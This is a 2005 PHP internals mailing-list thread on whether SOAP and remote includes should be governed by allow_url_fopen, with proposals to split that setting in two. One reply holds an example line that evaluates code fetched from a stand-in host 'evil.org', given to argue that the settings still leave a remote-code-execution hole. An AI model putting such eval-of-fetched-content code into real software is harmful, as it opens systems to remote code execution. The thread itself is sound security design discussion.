On Jul 28, 2005, at 9:28 AM, Zeev Suraski wrote:
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% diabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly can you do with it other than query remote data
sources?
I tend to agree with Adam (and I guess Wez) - SOAP should not be
affected by allow_url_fopen.
Why not simply make existing INI option only restrict script
loading operations such as include/require, afterall this is what
it tries to primarily prevent anyway.
That may be a good alternative. We need to figure out whether
there are any other functionality that may pose a security risk,
other than include/require of remote files - can anybody think of
anything? If not, then that's probably the best alternative:
1. Deprecate allow_url_fopens
2. Introduce allow_remote_code_execution
3. Introduce allow_remote_streams (effectively allow_url_fopens
renamed, except it doesn't affect include/require)
sure: eval('file_get_contents("http://evil.org";);');
You could say this is just bad policy on the part of code authors,
but that's what these options were geared to handle in the first
place, right?
George
--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
